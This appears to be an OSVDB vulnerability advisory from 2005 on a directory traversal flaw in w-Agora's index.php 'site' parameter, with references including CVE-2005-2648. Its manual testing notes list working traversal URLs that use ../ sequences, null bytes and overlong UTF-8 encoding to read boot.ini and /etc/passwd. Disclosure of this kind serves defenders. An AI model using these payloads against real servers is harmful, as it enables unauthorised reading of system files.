w-Agora index.php site Variable Traversal Arbitrary File Access

2005-08-18T08:08:13
ID OSVDB:18831
Type osvdb
Reporter OSVDB
Modified 2005-08-18T08:08:13

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'. Further, this issue only affects installations on Windows.

Manual Testing Notes

http://[target]/w-agora/index.php?site=../../../../../../../../boot.ini%00

http://[target]/w-agora/index.php?site=../../../../../../../../etc/passwd%00

http://[target]/w-agora/index.php?site=../../../../../../../../etc/passwd

http://[target]/w-agora/ index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini

http://[target]/w-agora/index.php?site=../../../../../../../../boot.ini

References:

Vendor URL: http://w-agora.net/ Security Tracker: 1014737 Secunia Advisory ID:16497 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0599.html ISS X-Force ID: 21906 CVE-2005-2648 Bugtraq ID: 14597